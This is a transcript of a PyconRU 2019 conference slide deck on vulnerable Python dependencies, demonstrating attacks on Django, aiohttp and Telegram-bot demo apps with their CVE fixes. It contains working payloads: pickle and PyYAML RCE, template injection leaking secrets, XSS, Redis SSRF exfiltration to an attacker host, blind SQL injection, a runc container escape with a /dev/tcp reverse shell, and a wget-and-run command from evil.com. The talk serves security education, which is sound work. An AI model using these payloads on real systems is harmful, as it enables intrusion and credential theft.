PyconRU 2019. (Un)safe dependencies.

Transcript

Tsyganov Ivan
Positive Technologies
(Un)safe
dependencies

View Slide

A9
Using Components
with Known
Vulnerabilities

View Slide

App1
Django
App2
aiohttp
App3
telegram

View Slide

App1
Django
App2
aiohttp
App3
telegram
Django
djangorestframework
Jinja2
psycopg2-binary
python 3.6

View Slide

document.addEventListener( 'DOMContentLoaded', function(event) { $.ajax({ url:'/api/goods/', success: function(result) { $(result).each(function() { $.ajax({ url:'/api/goods/'+this.id+'/', type:'DELETE' }) }) } }) } ); http: //example.com

View Slide

django-rest-framework >= 3.9.1

View Slide

...
APPEND_SLASH = True
...
settings.py
urlpatterns = [
...
re_path(r'^(.*)/$', universal_view),
...
]
urls.py

View Slide

http: //app.ru //evil.com

View Slide

http: //app.ru //evil.com
http: //evil.com

View Slide

django >= 2.0.8
django >= 1.11.15
CVE-2018-14574

View Slide

def universal_view(request, path=None):
env = SandboxedEnvironment(loader=PackageLoader('core', 'templates'))
return HttpResponse(
env.from_string(
f'{{% extends "error.html" %}}'
f'{{% block error_msg %}} '
f'Requested path : {path} not found'
f'{{% endblock %}}'
).render(request=request)
)

View Slide

env.from_string(
f'{{% endblock %}}'
)

View Slide

env.from_string(
f'{{% endblock %}}'
)

View Slide

env.from_string(
f'{{% endblock %}}'
)
{{ "{x.__name__}".format_map(dict(x=request.get_host)) }}

View Slide

CVE-2019-10906
Jinja2 >= 2.10.1

View Slide

{{ "

{x.__globals__[settings].SECRET_KEY}

{x.__globals__[settings].SESSION_ENGINE}

{x.__globals__[settings].SESSION_SERIALIZER}
".format_map(dict(x=request.get_host))|safe
}}

View Slide

from django.core import signing
from django.contrib.sessions.serializers import PickleSerializer
def decode_sid(SID):
return signing.loads(
SID,
key='-pt60pdz*)igai3kui9h1c#xverctogytxq6^ek=o6v12e%-*_',
serializer=PickleSerializer,
max_age=1209600,
salt='django.contrib.sessions.backends.signed_cookies',
)
decode_sid('gASVMgAAAAAAAAB9lIwEdXVpZJSMJGM3ODgwM ...R2DK7jU')
{'uuid': 'c78801e9-db4c-4f88-b988-f47a7f3ad172'}

View Slide

def encode_sid(command):
class Evil():
def __reduce__(self):
import subprocess
return (subprocess.getoutput, (command, ))
return signing.dumps(
{
'uuid': '', 'evil': Evil()
},
compress=True,
)
encode_sid("cat /etc/passwd")
'gASVRwAAAAAAAAB9lCiMBHV1aWSUjAC ...dEBLRDs4C0uLGQ5mzkLy-K_fKnc'

View Slide

class Evil():
import subprocess
{
},
compress=True,
)

View Slide

class Evil():
import subprocess
{
},
compress=True,
)

View Slide

import requests
...
...
result = decode_sid(
requests.get(
'http: //target.com',
cookies={
'sessionid': encode_sid(
command='cat /etc/passwd'
)
}
).cookies['sessionid']
)

View Slide

import requests
...
...
requests.get(
cookies={
)
}
)

View Slide

import requests
...
...
requests.get(
cookies={
)
}
)

View Slide

import requests
...
...
requests.get(
cookies={
)
}
)

View Slide

import requests
...
...
requests.get(
cookies={
)
}
)

View Slide

import requests
...
...
requests.get(
cookies={
)
}
)
>>> pprint.pprint(result)
{'evil': 'root:x:0:0:root:/root:/bin/bash\n'
'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n'
'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n'
'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n'
'sync:x:4:65534:sync:/bin:/bin/sync\n'
'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n'
'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n'
'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n'
'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n'
'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n'
'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n'
'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n'
'gnats:x:41:41:Gnats Bug-Reporting System '
'(admin):/var/lib/gnats:/usr/sbin/nologin\n'
'_apt:x:100:65534 ::/nonexistent:/bin/false',
'uuid': 'c3b29bac-3ce7-45a5-8680-3bd2a6e51307'}

View Slide

App1
Django
App2
aiohttp
App3
telegram
Django
djangorestframework
Jinja2
psycopg2-binary
python 3.6

View Slide

App2
aiohttp
App3
telegram
aiohttp-session
aiohttp-jinja2
aioredis
aiopg
sqlalchemy
lxml
PyYAML
python 3.6
App1
Django

View Slide

Property="og:image"
Content="https: //i.ebayimg.com/images/i/233117594563-0-1/s-l1000.jpg" />
Property="og:title"
Content="Python Cookbook, 3rd Edition, PDF ... | eBay" />
Property="og:url"
Content="https: // www.ebay.com/itm/Python-Cookbook- ...-for-Mastering-Python-" />
Property="og:description"
Content="If you need help writing programs in Python ... application domains." />

View Slide

Property="og:image"
Content="https: //i.ebayimg.com/images/i/233117594563-0-1/s-l1000.jpg" />
Property="og:title"
Content="Python Cookbook, 3rd Edition, PDF ... | eBay" />
Property="og:url"
Content="https: // www.ebay.com/itm/Python-Cookbook- ...-for-Mastering-Python-" />
Property="og:description"
Content="If you need help writing programs in Python ... application domains." />
...
property="og:title"
content="Some $.ajax({url:'http: //evil.com/some_unique_path'}) </ script>Title" /> ...

View Slide

Some
 $.ajax({ url:'http: //evil.com/some_unique_path' }) 
Title

View Slide

[01/Jan/2010:08:29:26 +0000] "GET /some_unique_path HTTP/1.1" 404
659 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47
Some
 $.ajax({ url:'http: //evil.com/some_unique_path' }) 
Title

View Slide

Very cool item

...

View Slide

Very cool item

...
 if (document.cookie.includes('hckd') ===false) { $.ajax({ url:'/logout', success:function(resp){ document.cookie='SESSIONID=7d58112080ed4c6dbcb05c560bcbc893'; document.cookie='hckd=1'; window.location.href='/' } }) }

View Slide

Very cool item

...
 if (document.cookie.includes('hckd') ===false) { $.ajax({ url:'/logout', success:function(resp){ document.cookie='SESSIONID=7d58112080ed4c6dbcb05c560bcbc893'; document.cookie='hckd=1'; window.location.href='/' } }) }

View Slide

Very cool item

...
 if (document.cookie.includes('hckd') ===false) { $.ajax({ url:'/logout', success:function(resp){ document.cookie='SESSIONID=7d58112080ed4c6dbcb05c560bcbc893'; document.cookie='hckd=1'; window.location.href='/'; } }) }

View Slide

aiohttp-session >= 2.4.0
CVE-2018-1000519

View Slide

EVAL "
for _, key in ipairs(redis.call('KEYS', '*')) do
redis.call(
'MIGRATE',
'evils_redis_host',
6379,
key,
0,
5000,
'COPY',
'REPLACE'
)
end" 0

View Slide

EVAL "
redis.call(
'MIGRATE',
'evils_redis_host',
6379,
key,
0,
5000,
'COPY',
'REPLACE'
)
end" 0

View Slide

EVAL "
redis.call(
'MIGRATE',
'evils_redis_host',
6379,
key,
0,
5000,
'COPY',
'REPLACE'
)
end" 0

View Slide

http: //redis:6379/?q=HTTP/1.1 \r\n
EVAL "for _,k in ipairs(redis.call('\''KEYS'\'',
'\''*'\'')) do redis.call('\''MIGRATE'\'',
'\''evils_redis_host'\'', 6379, k, 0, 5000,
'\''COPY'\'', '\''REPLACE'\'') end" 0 \r\n

View Slide

curl --request POST \
--url http: //target.com/goods \
--header 'content-type: application/x- www-form-
urlencoded' \
--data 'url=http: //redis:6379/?q=HTTP/
1.1%0D%0AEVAL "for _,k in
ipairs(redis.call('\''KEYS'\'', '\''*'\'')) do
redis.call('\''MIGRATE'\'',
'\''COPY'\'', '\''REPLACE'\'') end" 0 %0D%0A'

View Slide

--url http: //target.com/goods \
--header 'content-type: application/x- www-form-
urlencoded' \
--data 'url=http: //redis:6379/?q=HTTP/
1.1%0D%0AEVAL "for _,k in
ipairs(redis.call('\''KEYS'\'', '\''*'\'')) do
redis.call('\''MIGRATE'\'',
'\''COPY'\'', '\''REPLACE'\'') end" 0 %0D%0A'

View Slide

127.0.0.1:6379> KEYS *
1) "SESSIONID_f97f4d3353da4c87b8fdc7fdce12a51a"
2) "SESSIONID_b4bb7f94651d4d1496908b9a69150f03"
3) "SESSIONID_af90efcc865f4433adcd51625c9120b4"
4) "SESSIONID_8f07943134724991b6a356f6b75b7030"
5) "SESSIONID_ee1eab3a789d4d63a6be31a579c98a55"
6) "SESSIONID_d3b016fa73c6422b9166553e3783a78e"
127.0.0.1:6379> GET
SESSIONID_f97f4d3353da4c87b8fdc7fdce12a51a
"{\"created\": 1559895192, \"session\":
{\"username\": \"admin\", \"role\": \"admin\"}}"

View Slide

127.0.0.1:6379> KEYS *
1) "SESSIONID_f97f4d3353da4c87b8fdc7fdce12a51a"
2) "SESSIONID_b4bb7f94651d4d1496908b9a69150f03"
3) "SESSIONID_af90efcc865f4433adcd51625c9120b4"
4) "SESSIONID_8f07943134724991b6a356f6b75b7030"
5) "SESSIONID_ee1eab3a789d4d63a6be31a579c98a55"
6) "SESSIONID_d3b016fa73c6422b9166553e3783a78e"
127.0.0.1:6379> GET
SESSIONID_f97f4d3353da4c87b8fdc7fdce12a51a
"{\"created\": 1559895192, \"session\":
{\"username\": \"user1\", \"role\": \"user\"}}"

View Slide

--url http: //127.0.0.1/goods \
--header 'content-type: application/x- www-form-urlencoded' \
--data 'url=http: //redis:6379/?q=HTTP/1.1%0D%0ASET
SESSIONID_ee1eab3a789d4d63a6be31a579c98a55 "{\"created\":
1559895192, \"session\": {\"username\": \"admin\", \"role\":
\"admin\"}}"%0D%0AX:%0D%0A'

View Slide

redis >= 3.2.7
CVE-2016-10517

View Slide

python >= 3.7.3
python >= 2.7.17
CVE-2019-9947

View Slide

id limit (
CASE WHEN(
SELECT true FROM information_schema.tables
WHERE table_name ~ '.*user.*' limit 1
)
then 1 else 0 end
)

View Slide

id limit (
CASE WHEN(
)
then 1 else 0 end
)

View Slide

id limit (
CASE WHEN(
)
then 1 else 0 end
)
id limit (
CASE WHEN(
WHERE table_name = 'user' limit 1
)
then 1 else 0 end
)

View Slide

id limit (
CASE WHEN(
SELECT true FROM users WHERE role = 'admin'
and login = 'admin' and password ~ '.{8}'
limit 1
)
then 1 else 0 end

View Slide

id limit (
CASE WHEN(
and login = 'admin' and password ~ '.{8}'
limit 1
)
then 1 else 0 end
id limit (
CASE WHEN(
and login = 'admin' and password ~ 'passw0rd'
limit 1
)
then 1 else 0 end

View Slide

sqlalchemy >= 1.2.17
CVE-2019-7548

View Slide

items:
- name: Simple item
description: Simple item description
url: http: //my_goods.com/item1
img: http: //my_goods.com/item1.png
- name: Simple item 2
description: Simple item 2 description

View Slide

items:
- name: Simple item
unknown_field: !!python/object/apply:subprocess.check_output
args:
- ['python', '-c', 'from urllib.request import urlopen;
urlopen("http: //evil_nginx/evil.html").getcode(); exit(0);']

View Slide

[1/Jan/2010:07:14:37 +0000] "GET /evil.html HTTP/1.1" 200 1126
"-" "Python-urllib/3.6" "-"
items:
- name: Simple item
unknown_field: !!python/object/apply:subprocess.check_output
args:
- ['python', '-c', 'from urllib.request import urlopen;
urlopen("http: //evil_nginx/evil.html").getcode(); exit(0);']

View Slide

PyYAML >= 5.1
CVE-2017-18342

View Slide

App2
aiohttp
App3
telegram
aiohttp-session
aiohttp-jinja2
aioredis
aiopg
sqlalchemy
lxml
PyYAML
python 3.6
App1
Django

View Slide

App3
telegram
pyTelegramBotAPI
flask
python 2.7.9
App1
Django
App2
aiohttp

View Slide

file: ///etc/

View Slide

file: ///code/bot.py

View Slide

python >= 3.7.3
python >= 2.7.17
CVE-2019-9948

View Slide

API_TOKEN = ''
WEBHOOK_HOST = 'target.com'
WEBHOOK_PORT = 443
WEBHOOK_LISTEN = '0.0.0.0'
WEBHOOK_SSL_CERT = './cert.pem'
WEBHOOK_SSL_PRIV = './privkey.pem'
WEBHOOK_URL_BASE = "https: //%s:%s" % (WEBHOOK_HOST, WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/secret_bot_hook/"

View Slide

...
OWNER_ID = 11111111
...
@bot.message_handler(func=lambda message: message.from_user.id ==OWNER_ID,
content_types=['text'], commands=['run'])
def run_command(message):
try:
import commands
_, _, command = message.text.partition(' ')
status, output = commands.getstatusoutput(command)
bot.send_message(message.chat.id, output)
except:
from traceback import format_exc
bot.send_message(message.chat.id, format_exc())

View Slide

...
OWNER_ID = 11111111
...
try:
import commands
except:

View Slide

...
OWNER_ID = 11111111
...
try:
import commands
except:

View Slide

curl --request POST --url 'https: //target.com/
bot_hook/' --header 'content-type: application/json'
--data '{"update_id": 0, "message": {"message_id": 0,
"from": {"id": 11111111, "is_bot": false,
"first_name": "Some", "last_name": "User",
"username": "some_user", "language_code": "en"},
"chat": {"id": 777777777, "first_name": "Some",
"last_name": "User", "username": "some_user", "type":
"private"}, "date": 0, "text": "/run cat /etc/
passwd", "entities": [{"offset": 0, "length": 4,
"type": "bot_command"}]}}'

View Slide

App3
telegram
pyTelegramBotAPI
flask
python 2.7.9
App1
Django
App2
aiohttp

View Slide

App1
Django
App2
aiohttp
App3
telegram

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE
import os
import stat
target_file = '/bin/sh'
with open(target_file, 'w') as evil:
evil.write('#!/proc/self/exe')
os.chmod(target_file, stat.S_IXOTH)
write_handler = None
while not write_handler:
for pid in os.popen('ps -A -o pid'):
pid = pid.strip()
if pid == 'PID': continue
try:
with open(f'/proc/{pid}/cmdline', 'r') as cmdline:
if cmdline.read().find('runc') >= 0:
handler = os.open(f'/proc/{pid}/exe', os.O_PATH)
handler_path=f'/proc/self/fd/{str(handler)}'
write_handler = os.open(handler_path, os.O_WRONLY | os.O_TRUNC)
break
except Exception:
continue
payload = b'#!/bin/bash\nbash -i >& /dev/tcp/127.0.0.1/4444 0>&1\n'
result = os.write(write_handler, payload)
exploit.py

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE
import os
import stat
target_file = '/bin/sh'
with open(target_file, 'w') as evil:
evil.write('#!/proc/self/exe')
os.chmod(target_file, stat.S_IXOTH)
write_handler = None
while not write_handler:
for pid in os.popen('ps -A -o pid'):
pid = pid.strip()
if pid == 'PID': continue
try:
with open(f'/proc/{pid}/cmdline', 'r') as cmdline:
if cmdline.read().find('runc') >= 0:
handler = os.open(f'/proc/{pid}/exe', os.O_PATH)
handler_path=f'/proc/self/fd/{str(handler)}'
write_handler = os.open(handler_path, os.O_WRONLY | os.O_TRUNC)
break
except Exception:
continue
payload = b'#!/bin/bash\nbash -i >& /dev/tcp/127.0.0.1/4444 0>&1\n'
result = os.write(write_handler, payload)
exploit.py

View Slide

[email protected]:/root# nc -k -l 4444

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE
wget http: //evil.com/exploit.py -O exp.py && python exp.py

View Slide

[email protected]:/root#

View Slide

[email protected]:/root# whoami

View Slide

whoami
root
[email protected]:/root#

View Slide

whoami
root
[email protected]:/root# cat /etc/passwd

View Slide

whoami
root
[email protected]:/root# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

View Slide

docker >= 18.09.2
CVE-2019-5736

View Slide

App1
Django
App2
aiohttp
App3
telegram
Pickle.load
RCE
yaml.load
RCE
Broken Access
RCE
runc allows attackers to overwrite the host runc binary

View Slide

How to prevent
✤ Remove unused dependencies and documentation

View Slide

How to prevent
✤ Obtain components from pip or ofﬁcial sources

View Slide

How to prevent
distrib
djanga
easyinstall
junkeldat
libpeshka
mumpy
mybiubiubiu
nmap-python
openvc
python-ftp
pythonkafka
python-mongo
python-mysql
python-mysqldb
python-openssl
python-sqlite
smb
virtualnv

PyconRU 2019. (Un)safe dependencies.

PyconRU 2019. (Un)safe dependencies.

Ivan Tsyganov

More Decks by Ivan Tsyganov

Other Decks in Programming

Featured

Transcript